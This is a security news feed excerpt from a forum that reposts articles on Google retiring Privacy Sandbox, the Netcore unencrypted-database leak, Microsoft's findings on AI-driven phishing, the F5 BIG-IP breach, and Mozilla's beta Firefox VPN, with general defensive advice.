	The company launched Privacy Sandbox in 2019 as a future replacement to third-party cookies. It's a set of open standards that are supposed to enable personalized ads without divulging identifying data. Over the years, Google's plans to deprecate third-party cookies got pushed back again and again due to a series of delays and regulatory hurdles. Specifically, both the UK's Competition and Markets Authority (CMA) and the US Department of Justice looked into the Privacy Sandbox out of concerns that it could harm smaller advertisers.
</p>

<p>
	 
</p>

<p>
	In 2024, Google ultimately decided not to kill third-party cookies in Chrome and instead chose to roll out "a new experience in Chrome that lets people make an informed choice that applies across their web browsing." Just this April, Google announced that it wasn't going to make any to changes to how third-party cookies work on the Chrome browser at all, and that it was going to "maintain [its] current approach to offering users third-party cookie choice in Chrome." At the time, the company said that it was going to keep the Privacy Sandbox initiative alive, but things have clearly changed since then. Chavez wrote in the latest update that Google will "continue to utilize learnings from the retired Privacy Sandbox technologies."
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.engadget.com/cybersecurity/google-has-killed-privacy-sandbox-130029899.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31952</guid><pubDate>Sat, 18 Oct 2025 13:12:59 +0000</pubDate></item><item><title>&#x201C;I saw numerous records marked as confidential&#x201D; &#x2014; 40 billion unencrypted files spilled by a marketing firm that never expected you to look</title><link>https://nsaneforums.com/news/security-privacy-news/%E2%80%9Ci-saw-numerous-records-marked-as-confidential%E2%80%9D-%E2%80%94-40-billion-unencrypted-files-spilled-by-a-marketing-firm-that-never-expected-you-to-look-r31942/</link><description><![CDATA[<h3>
	Another day, another data leak. This time it’s 13TB and 40 billion records — courtesy of Netcore.
</h3>

<p id="e62b5aee-1fa3-4f87-ba51-540c8130ce2c">
	It's 2025, and your data still isn't safe in the hands of corporations that should know a lot better than to store it in an unencrypted database. And yet, stories like these continue to send shivers down the spines of cybersecurity experts everywhere.
</p>

<p>
	 
</p>

<p>
	This time, the leak involves a company called Netcore Cloud Pvt. Ltd, based in Mumbai, India. <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://netcorecloud.com/" href="https://netcorecloud.com/" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">Netcore's website</a> states that its <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/artificial-intelligence" data-before-rewrite-redirect="https://www.windowscentral.com/tag/artificial-intelligence" href="https://www.windowscentral.com/artificial-intelligence" rel="external nofollow">AI</a>-powered "comprehensive customer experience platform" is trusted by more than 6,500 brands around the world, so it's not like it's a small company.
</p>

<p>
	 
</p>

<p>
	<a data-hl-processed="none" data-url="" href="" id="elk-seasonal" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel=""></a>
</p>

<aside class="hawk-root" data-block-type="embed" data-render-type="fte" data-result="missing" data-skip="dealsy" data-widget-id="de2bffd6-46e2-4346-9d50-1cf63eaf2f5a" data-widget-type="seasonal">
	 
</aside>

<p id="e62b5aee-1fa3-4f87-ba51-540c8130ce2c-2">
	An unencrypted database with roughly 40 billion records — coming out to about 13TB of data — was discovered by cybersecurity researcher Jeremiah Fowler, who tipped off <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.websiteplanet.com/news/netcore-cloud-breach-report/" href="https://www.websiteplanet.com/news/netcore-cloud-breach-report/" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">Website Planet</a> with his findings.
</p>

<p>
	 
</p>

<p id="05da0e13-b76e-47ac-bd8a-87b32486de3d">
	The 40 billion records contained "copious amounts of email addresses, message subjects, and more," as well as banking and healthcare notices, including "partial account numbers and specific information" deemed as too sensitive to be exposed publicly. Fowler says he "saw numerous records marked as confidential" while scouring the database.
</p>

<figure id="84507c59-90b0-46d1-838d-e2fe10249560">
	<blockquote class="QuoteNewsStyle">
		<p>
			I saw numerous records marked as confidential — all exposed, all unencrypted.
		</p>

		<p>
			 
		</p>

		<p>
			<em><cite>— Security researcher Anurag Sen, after discovering 13TB of marketing data left wide open.</cite></em>
		</p>
	</blockquote>
</figure>

<p id="8f3a4836-3b24-471f-ac64-061682159aab">
	Fowler says the database lacked password protection and encryption of any sort, meaning anyone who stumbled on (or was tipped off to) the database could freely browse its contents.
</p>

<p>
	 
</p>

<p>
	Upon discovering the security faux pas, Fowler contacted Netcore, as much of the information he found was connected to the company. Fowler says that access to the open database was restricted on the same day he sent the notice.
</p>

<p>
	 
</p>

<p>
	It's important to point out that it remains unclear if Netcore itself was managing the database or if the task was farmed out to a third party. Fowler also has no idea how long the unencrypted information was on the web, or if anyone else had accessed it before he tipped off Netcore.
</p>

<div id="slice-container-newsletterForm-articleInbodyContent-754yKLRpnNeRhuM6Ksfihd">
	<div data-hydrate="true">
		<h2 id="bad-actors-can-do-a-lot-of-damage-with-only-a-few-emails-3">
			Bad actors can do a lot of damage with only a few emails
		</h2>

		<p id="a3e20541-cb52-4b89-aa16-fcf9bb3cf0e9">
			You might be surprised at the ingenuity working behind the scenes of hacking and phishing schemes. Unfortunately, it doesn't take a lot of information for bad actors to get started on their next scam.
		</p>

		<p>
			 
		</p>

		<p>
			As Fowler points out in his report, email addresses and records can be enough for bad actors to create a profile of a victim, which can ultimately lead to a higher chance of being successful with phishing attempts.
		</p>

		<p>
			 
		</p>

		<p>
			Say a bad actor knows that a specific email address — which often contains a full name — receives messages from a specific company, like a telecom. The scammer could create an email that looks official, asking for sensitive details within the scope of your working relationship with the telecom.
		</p>

		<p>
			 
		</p>

		<p>
			These details, which are readily handed over to an entity you believe is legitimate, can then be added to the profile that's already underway. With enough work, risks of "social-engineering, account or password recovery, or even account takeover attempts" are possible.
		</p>

		<p>
			 
		</p>

		<p>
			Fowler makes it clear that he's not implying that this data breach related to Netcore has resulted in this sort of criminal activity, but that he's only giving hypothetical situations for "educational purposes."
		</p>

		<h2 id="add-it-to-the-pile-of-major-data-breaches-in-2025-3">
			Add it to the pile of major data breaches in 2025
		</h2>

		<div>
			<div>
				<p>
					<picture data-new-v2-image="true"> <source sizes="(min-width: 1000px) 970px, calc(100vw - 40px)" srcset="https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-1200-80.jpg.webp 1200w, https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-1024-80.jpg.webp 1024w, https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-970-80.jpg.webp 970w, https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-650-80.jpg.webp 650w, https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-480-80.jpg.webp 480w, https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-320-80.jpg.webp 320w" type="image/webp"> <img alt="Asterisks on a pink background over a black and white human hand." class="ipsImage" data-new-v2-image="true" height="720" width="720" src="https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-1024-80.jpg"> </source></picture>
				</p>

				<p>
					<em><span>2025 has had some major data breaches, and I don't expect them to stop anytime soon. </span></em>
				</p>

				<p>
					<em><span itemprop="copyrightHolder">(Image credit: Getty Images | Boris Zhitkov)</span></em>
				</p>

				<p>
					 
				</p>

				<p id="8be66479-5662-4d32-bbbf-dc0ab50910cd">
					The 13TB trove of potentially sensitive data uncovered by Fowler is, unfortunately, just another unnerving cyber situation in 2025.
				</p>

				<p>
					 
				</p>

				<p>
					Working back in time from the present, there was the notable <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/gaming/pc-gaming/hackers-infiltrate-discords-id-checks-and-its-bad-news-70-000-users-personal-data-exposed" href="https://www.windowscentral.com/gaming/pc-gaming/hackers-infiltrate-discords-id-checks-and-its-bad-news-70-000-users-personal-data-exposed" target="_blank" rel="external nofollow">Discord data breach </a>from earlier this month that saw the ID photos and personal data of 70,000 users leak out. The hackers demanded a $5 million ransom before dropping it to $3.5 million; <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/discord" href="https://www.windowscentral.com/tag/discord" rel="external nofollow">Discord</a> refused to pay.
				</p>

				<p>
					 
				</p>

				<p>
					Then there was the <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/plex-was-hacked-security-incident-may-have-compromised-your-account-information-heres-what-to-do" href="https://www.windowscentral.com/software-apps/plex-was-hacked-security-incident-may-have-compromised-your-account-information-heres-what-to-do" target="_blank" rel="external nofollow">September Plex leak</a> involving emails and hashed passwords, which resulted in a strong suggestion from Plex for users to change their credentials.
				</p>

				<p>
					 
				</p>

				<p>
					In June, it was reported that <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/16-billion-accounts-in-largest-data-breach" href="https://www.windowscentral.com/software-apps/16-billion-accounts-in-largest-data-breach" target="_blank" rel="external nofollow">16 billion accounts and their credentials — aka "the largest data breach" — had been exposed</a>, including passwords for Facebook, Google, and Apple.
				</p>

				<figure id="3b37e9d6-a3a0-41c4-8788-48304ecb6ceb">
					<blockquote class="QuoteNewsStyle">
						<p>
							This wasn’t a breach. It was a billboard.
						</p>

						<p>
							 
						</p>

						<p>
							<em><cite>— 40 billion records, including names, emails, and device info, left exposed by a company that sells trust for a living.</cite></em>
						</p>
					</blockquote>
				</figure>

				<p id="1ad7dfa7-0835-464e-840e-3f0391c6b45a">
					And in April, Elon Musk's X — formerly known as Twitter — was hit by a <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/twitter/elon-musks-x-might-have-a-mole-problem" href="https://www.windowscentral.com/software-apps/twitter/elon-musks-x-might-have-a-mole-problem" target="_blank" rel="external nofollow">data leak containing 2.8 billion user IDs</a>. The hackers claimed that they attempted to contact X with the information; following repeated rebukes, the hackers released the information publicly.
				</p>

				<p>
					 
				</p>

				<p>
					So, what can you do to mitigate the chances of your data leaking out to the public? Unfortunately, once it's in the hands of a corporation, there's not much that you can do other than hope security measures are up to snuff.
				</p>

				<p>
					 
				</p>

				<p>
					All I can say is, remain vigilant about <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/windows-11/how-to-report-phishing-emails-to-microsoft-in-outlook-for-windows-11" href="https://www.windowscentral.com/software-apps/windows-11/how-to-report-phishing-emails-to-microsoft-in-outlook-for-windows-11" rel="external nofollow">email phishing attempts</a>. Don't click links you don't recognize, and always check a sender's email address for irregularities. Stay away from unsecured websites, and keep your PC up to date.
				</p>

				<p>
					 
				</p>

				<p>
					As always, use strong passwords (ideally randomly generated using a password manager), update them frequently, and use <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/how-set-two-step-verification-microsoft-accounts" href="https://www.windowscentral.com/how-set-two-step-verification-microsoft-accounts" rel="external nofollow">multi-factor authentication</a> in case anyone does get a hold of your credentials.
				</p>

				<p>
					 
				</p>

				<p>
					<a href="https://www.windowscentral.com/hardware/storage/13tb-40-billion-records-data-leak-netcore" rel="external nofollow">Source</a>
				</p>

				<hr class="ipsHr">
				<p>
					<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
				</p>

				<p>
					<span style="font-size:12px;"><em>Posted Saturday 18 October 2025 at 3:41 am AEST (my time).</em></span>
				</p>

				<p>
					<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
				</p>

				<p>
					<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
				</p>
			</div>
		</div>
	</div>
</div>
]]></description><guid isPermaLink="false">31942</guid><pubDate>Fri, 17 Oct 2025 17:42:25 +0000</pubDate></item><item><title>People are falling for AI phishing attempts 4.5x more often than human ones but the solutions are the same as ever</title><link>https://nsaneforums.com/news/security-privacy-news/people-are-falling-for-ai-phishing-attempts-45x-more-often-than-human-ones-but-the-solutions-are-the-same-as-ever-r31935/</link><description><![CDATA[<p>
	There's a peculiar tint to the modern digital landscape: everything is somehow both the same as it's always been, and yet entirely different. We still use Google, but we get a handy AI summary up top. We still get phished, but it's being done to us by AI. On this latter point, Microsoft's 2025 Digital Defense Report (PDF warning) points out that AI is now actually 4.5x more successful at getting users to click malicious links than standard attempts (via The Register).
</p>

<p>
	 
</p>

<p>
	More specifically, "AI-automated phishing emails achieved 54% click-through rates compared to 12% for standard attempts" because "AI enables more targeted phishing and better phishing lures." The bulk of the data from the report is collected from Microsoft's fiscal year 2025, from July 1, 2024 to June 30, 2025.
</p>

<p>
	 
</p>

<p>
	In addition, "AI automation has the potential to increase phishing profitability by up to 50 times by scaling highly targeted attacks to thousands of targets at minimal cost. This massive return on investment will incentivise cyber threat actors who aren’t yet using AI to add it to their toolbox in the future."
</p>

<p>
	 
</p>

<p>
	Phishing is the attempt to trick people into clicking malicious links or downloading malicious files by pretending to be legitimate. For instance, it might be an email pretending to be from your employer, trying to get you to download an infected file that's disguised as an innocent presentation or spreadsheet. Or it might send you to a website that will ask for your details.
</p>

<p>
	 
</p>

<p>
	Microsoft explains that AI can "automate phishing campaigns, generate deepfakes, and craft highly convincing fraudulent messages." That makes sense because AI has developed enough that it can craft exploits and attacks that a very intelligent and knowledgeable bad actor could.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<span style="font-size:12px;"><img alt="dcBbYJeH9xN4gK6jiyhNNm-1200-80.jpg.webp" class="ipsImage" data-ratio="75.10" height="405" width="720" src="https://cdn.mos.cms.futurecdn.net/dcBbYJeH9xN4gK6jiyhNNm-1200-80.jpg.webp" /></span>
</p>

<p style="text-align:center;">
	<span style="font-size:12px;">(Image credit: seksan Mongkhonkhamsao @ Getty Images)</span>
</p>

<p>
	 
</p>

<p>
	These phishing stats just point towards a more general—and, of course, expected—trend towards AI being used for nefarious purposes, not just for phishing:
</p>

<p>
	 
</p>

<p>
	"We’re witnessing adversaries deploy generative AI for a variety of activities, including scaling social engineering, automating lateral movement, engaging in vulnerability discovery, and even real-time evasion of security controls. Autonomous malware and AI-powered agents are now capable of adapting their tactics on the fly, challenging defenders to move beyond static detection and embrace behavior-based, anticipatory defense."
</p>

<p>
	 
</p>

<p>
	It can be easy to jump on the anti-AI bandwagon upon hearing things like this—and I'm no stranger to such sentiment—but I'm conscious that I'm hearing about this on the same day I'm hearing that AI has discovered a promising new cancer treatment method. Pros and cons, as always.
</p>

<p>
	 
</p>

<p>
	Plus, there's the fact that AI is used to help defend from cyber attacks these days. I suppose that's just what happens in an arms race, though; the neorealist in me sees such tit-for-tat escalations as inevitable to maintain equilibrium between different states and powers.
</p>

<p>
	 
</p>

<p>
	The good news is that it doesn't seem there's much different, in principle, that we should be doing—just ramping up more of the same. For instance, Microsoft says that "no matter how much the cyber threat landscape changes, multifactor authentication (MFA) still blocks over 99% of unauthorized access attempts, making it the single most important security measure an organization can implement."
</p>

<p>
	 
</p>

<p>
	Of course, MFA might do little to prevent you from falling for a phishing attack. On that front, though, Microsoft's recommendations are again more and better implementations of the same defences we're used to: Inbox filters, restrictions on external communications, limiting remote access tools, educating users, and keeping an eye out for common patterns of attack behaviours.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.pcgamer.com/software/security/people-are-falling-for-ai-phishing-attempts-4-5x-more-often-than-human-ones-but-the-solutions-are-the-same-as-ever/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31935</guid><pubDate>Fri, 17 Oct 2025 16:02:30 +0000</pubDate></item><item><title>Why the F5 Hack Created an &#x2018;Imminent Threat&#x2019; for Thousands of Networks</title><link>https://nsaneforums.com/news/security-privacy-news/why-the-f5-hack-created-an-%E2%80%98imminent-threat%E2%80%99-for-thousands-of-networks-r31926/</link><description><![CDATA[<h3>
	Networking software company F5 disclosed a long-term breach of its systems this week. The fallout could be severe.
</h3>

<p>
	<span class="lead-in-text-callout">Thousands of networks—many</span> of them operated by the US government and Fortune 500 companies—face an “imminent threat” of being breached by a nation-state hacking group following the breach of a major maker of software, the federal government warned on Wednesday.
</p>

<p>
	 
</p>

<p>
	F5, a Seattle-based maker of networking software, <a class="external-link" data-aps-asc-tag="w050b-20" data-aps-asin="K000154696" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://my.f5.com/manage/s/article/K000154696" href="https://my.f5.com/manage/s/article/K000154696" rel="external nofollow" target="_blank">disclosed the breach</a> on Wednesday. F5 said a “sophisticated” threat group working for an undisclosed nation-state government had surreptitiously and persistently dwelled in its network over a “long term.” Security researchers who have responded to similar intrusions in the past took the language to mean the hackers were inside the F5 network <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://cyberplace.social/@GossiTheDog/115378445416288653" href="https://cyberplace.social/@GossiTheDog/115378445416288653" rel="external nofollow" target="_blank">for years</a>.
</p>

<h2 class="paywall">
	Unprecedented
</h2>

<p>
	During that time, F5 said, the hackers took control of the network segment the company uses to create and distribute updates for BIG IP, a line of server appliances that F5 <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://www.f5.com/c/emea-2020/event/f5-myforum" href="https://www.f5.com/c/emea-2020/event/f5-myforum" rel="external nofollow" target="_blank">says</a> is used by 48 of the world’s top 50 corporations. Wednesday’s disclosure went on to say the threat group downloaded proprietary BIG-IP source code information about vulnerabilities that had been privately discovered but not yet patched. The hackers also obtained configuration settings that some customers used inside their networks.
</p>

<p>
	 
</p>

<p>
	Control of the build system and access to the source code, customer configurations, and documentation of unpatched vulnerabilities has the potential to give the hackers unprecedented knowledge of weaknesses and the ability to exploit them in supply-chain attacks on thousands of networks, many of which are sensitive. The theft of customer configurations and other data further raises the risk that sensitive credentials can be abused, F5 and outside security experts said.
</p>

<p>
	 
</p>

<p>
	Customers position BIG-IP at the very edge of their networks for use as load balancers and firewalls, and for inspection and encryption of data passing into and out of networks. Given BIG-IP's network position and its role in managing traffic for web servers, <a href="https://arstechnica.com/information-technology/2022/05/hackers-are-actively-exploiting-big-ip-vulnerability-with-a-9-8-severity-rating/" rel="external nofollow">previous compromises</a> have allowed adversaries to expand their access to other parts of an infected network.
</p>

<p>
	 
</p>

<p>
	F5 said that investigations by two outside intrusion-response firms have yet to find any evidence of supply-chain attacks. The company attached letters from firms IOActive and NCC Group attesting that analyses of source code and build pipeline uncovered no signs that a “threat actor modified or introduced any vulnerabilities into the in-scope items." The firms also said they didn’t identify any evidence of critical vulnerabilities in the system. Investigators, which also included Mandiant and CrowdStrike, found no evidence that data from its CRM, financial, support case management, or health systems was accessed.
</p>

<p>
	 
</p>

<p>
	The company released updates for its BIG-IP, F5OS, BIG-IQ, and APM products. CVE designations and other details are <a class="external-link" data-aps-asc-tag="w050b-20" data-aps-asin="K000156572" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://my.f5.com/manage/s/article/K000156572" href="https://my.f5.com/manage/s/article/K000156572" rel="external nofollow" target="_blank">here</a>. Two days ago, F5 <a class="external-link" data-aps-asc-tag="w050b-20" data-aps-asin="K000157005" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://my.f5.com/manage/s/article/K000157005" href="https://my.f5.com/manage/s/article/K000157005" rel="external nofollow" target="_blank">rotated</a> BIG-IP signing certificates, though there was no immediate confirmation that the move is in response to the breach.
</p>

<p>
	 
</p>

<p>
	The US Cybersecurity and Infrastructure Security agency has <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices" href="https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices" rel="external nofollow" target="_blank">warned</a> that federal agencies that rely on the appliance face an “imminent threat” from the thefts, which “pose an unacceptable risk.” The agency went on to direct federal agencies under its control to take “emergency action.” The UK’s National Cyber Security Center <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://www.ncsc.gov.uk/news/confirmed-compromise-f5-network" href="https://www.ncsc.gov.uk/news/confirmed-compromise-f5-network" rel="external nofollow" target="_blank">issued</a> a similar directive.
</p>

<p>
	 
</p>

<p>
	CISA has ordered all federal agencies it oversees to immediately take inventory of all BIG-IP devices in networks they run or in networks that outside providers run on their behalf. The agency went on to direct agencies to install the updates and follow a threat-hunting guide that F5 has also issued. BIG-IP users in private industry should do the same.
</p>

<p>
	 
</p>

<p>
	<em>This story originally appeared on</em> <em><a href="https://arstechnica.com/security/2025/10/breach-of-f5-requires-emergency-action-from-big-ip-users-feds-warn/" rel="external nofollow">Ars Technica</a>.</em>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.wired.com/story/f5-hack-networking-software-big-ip/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Friday 17 October 2025 at 12:51 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">31926</guid><pubDate>Fri, 17 Oct 2025 02:53:07 +0000</pubDate></item><item><title>Firefox gets a new security feature that Edge has had for years &#x2014; here&#x2019;s how it works, who gets access, and how it compares</title><link>https://nsaneforums.com/news/security-privacy-news/firefox-gets-a-new-security-feature-that-edge-has-had-for-years-%E2%80%94-here%E2%80%99s-how-it-works-who-gets-access-and-how-it-compares-r31924/</link><description><![CDATA[<h3>
	The new Firefox VPN is not the same as Mozilla VPN, but it is quite similar to Edge's built-in tool.
</h3>

<p id="09b35dbb-a4c5-41b4-8f47-ef1351111230">
	<a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/mozilla" href="https://www.windowscentral.com/tag/mozilla" rel="external nofollow">Mozilla</a> has cooked up a new way to keep your browser habits safe from spying eyes: <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/firefox" href="https://www.windowscentral.com/tag/firefox" rel="external nofollow">Firefox</a> VPN. The latest Firefox VPN is currently in a Beta stage for testing, and Mozilla says that it's only available for a limited time to randomly selected users (via <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.techradar.com/vpn/vpn-services/mozilla-is-experimenting-with-a-free-built-in-vpn-in-firefox-but-you-might-not-be-able-to-try-it-yet" href="https://www.techradar.com/vpn/vpn-services/mozilla-is-experimenting-with-a-free-built-in-vpn-in-firefox-but-you-might-not-be-able-to-try-it-yet" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">TechRadar</a>).
</p>

<p>
	 
</p>

<p>
	Firefox VPN is a free addition to the web browser, and the wording in the Mozilla support document suggests that it will remain free after the testing period. Firefox has not placed any data limits, at least during the testing period.
</p>

<p>
	<a data-hl-processed="none" data-url="" href="" id="elk-seasonal" referrerpolicy="no-referrer-when-downgrade" rel="" target="_blank"></a>
</p>

<aside class="hawk-root" data-block-type="embed" data-render-type="fte" data-result="missing" data-skip="dealsy" data-widget-id="6122221e-2128-4aa5-b1df-661ebfde41c9" data-widget-type="seasonal">
	 
</aside>

<p id="09b35dbb-a4c5-41b4-8f47-ef1351111230-2">
	Firefox VPN is designed to work within the Firefox browser only. Any web traffic that originates in the browser is directed through <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/how-manually-configure-vpn-windows-11" href="https://www.windowscentral.com/how-manually-configure-vpn-windows-11" rel="external nofollow">VPN</a> servers managed by Firefox; any other web traffic originating elsewhere is not protected.
</p>

<p>
	 
</p>

<p>
	Mozilla says it works by "concealing your real IP as well as adding a layer of encryption to your communications" on the <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://support.mozilla.org/en-US/kb/use-ip-concealment-in-firefox" href="https://support.mozilla.org/en-US/kb/use-ip-concealment-in-firefox" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">official Firefox VPN support page</a>. Sounds like a standard VPN, albeit with limited scope.
</p>

<p>
	 
</p>

<p>
	Because the new VPN built into Firefox is invite-only while it's being tested, not everyone will get to give it a try. If you're one of the lucky users who is selected for testing, you'll see a prompt pop up when you launch Firefox asking if you'd like to try Firefox VPN.
</p>

<p>
	 
</p>

<p>
	If you don't see the prompt, well, you're out of luck for now.
</p>

<p>
	<a data-hl-processed="none" data-url="" href="" id="elk-0f2fd6a2-b321-4399-ae07-98f73e88d94b" referrerpolicy="no-referrer-when-downgrade" rel="" target="_blank"></a>
</p>

<h2 id="this-is-mozilla-s-second-vpn-to-enter-the-market-3">
	This is Mozilla's second VPN to enter the market
</h2>

<p id="31a53c37-d07b-415e-9a48-26434edcf3ca">
	A lot of Firefox users wondered why Mozilla called its first VPN "Mozilla VPN" and not "Firefox VPN" when it launched a few years ago. They now have an answer.
</p>

<p>
	 
</p>

<p>
	Yes, this is Mozilla's second VPN to enter the market. Mozilla VPN officially launched in 2020 following the retirement/rebranding of Firefox Private Network.
</p>

<p>
	 
</p>

<p>
	Mozilla VPN is a full-fledged VPN service that covers your entire PC or device, not just your data in Firefox. <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://support.mozilla.org/en-US/kb/how-download-and-install-mozilla-vpn-windows" href="https://support.mozilla.org/en-US/kb/how-download-and-install-mozilla-vpn-windows" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">Mozilla VPN has a standalone app</a> available for <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/tag/windows-10" href="https://www.windowscentral.com/tag/windows-10" rel="external nofollow">Windows 10</a> and <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/microsoft/windows/windows-11" data-before-rewrite-redirect="https://www.windowscentral.com/software-apps/windows-11" href="https://www.windowscentral.com/microsoft/windows/windows-11" rel="external nofollow">Windows 11</a>, as well as plenty of other devices.
</p>

<p>
	 
</p>

<p>
	As with most VPN services that cover all of your web traffic, Mozilla VPN is not free. You can subscribe on a monthly or yearly basis, and the lowest price you'll get is <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.mozilla.org/en-US/products/vpn/" href="https://www.mozilla.org/en-US/products/vpn/" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">about $4.99 per month</a> when you subscribe for a full year.
</p>

<p>
	 
</p>

<p>
	Not bad, especially as it allows you to use up to five devices under the same account.
</p>

<p>
	 
</p>

<p>
	But for those who don't want to pay a monthly subscription fee, Firefox VPN should be a tempting feature once it arrives (hopefully for free) for all Firefox users.
</p>

<p>
	<a data-hl-processed="none" data-url="" href="" id="elk-ef886e1f-4d86-4cc5-98d7-9ad1d15b6fa3" referrerpolicy="no-referrer-when-downgrade" rel="" target="_blank"></a>
</p>

<h2 id="a-free-vpn-i-thought-i-was-supposed-to-avoid-those-3">
	A free VPN? I thought I was supposed to avoid those...
</h2>

<div>
	<div>
		<p>
			<picture data-new-v2-image="true"> <source sizes="(min-width: 1000px) 970px, calc(100vw - 40px)" srcset="https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-1200-80.jpg.webp 1200w, https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-1024-80.jpg.webp 1024w, https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-970-80.jpg.webp 970w, https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-650-80.jpg.webp 650w, https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-480-80.jpg.webp 480w, https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-320-80.jpg.webp 320w" type="image/webp"> <img alt="FreeVPN.one website featured in the Microsoft Edge browser on Windows 11 (2025)." class="ipsImage" data-new-v2-image="true" height="720" width="720" src="https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-1024-80.jpg"> </source></picture>
		</p>

		<p>
			<em><span>Free VPNs are generally best avoided, but there are some exceptions. </span></em>
		</p>

		<p>
			<em><span itemprop="copyrightHolder">(Image credit: Future | Daniel Rubino)</span></em>
		</p>

		<p>
			 
		</p>

		<p id="b1b79db1-0bd8-419a-a21b-758651f36214">
			<a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/do-you-need-vpn" href="https://www.windowscentral.com/do-you-need-vpn" rel="external nofollow">VPNs are powerful tools</a> that block third parties and bad actors from seeing the data you send out over the internet. It achieves this by shuttling your data through encrypted tunnels, with endpoint servers managed by the VPN company.
		</p>

		<p>
			 
		</p>

		<p>
			Because whoever is managing the servers can technically see what everyone is doing and where the data is coming from, you always want to select your VPN provider carefully.
		</p>

		<p>
			 
		</p>

		<p>
			Free VPNs are usually the worst offenders when it comes to selling your data that you thought was private. If a VPN service is free, it's often suspected that your data is being sold somewhere.
		</p>

		<p>
			 
		</p>

		<p>
			However, Mozilla says that its new Firefox VPN only collects technical data that's required to keep the service operating smoothly. Mozilla states:
		</p>

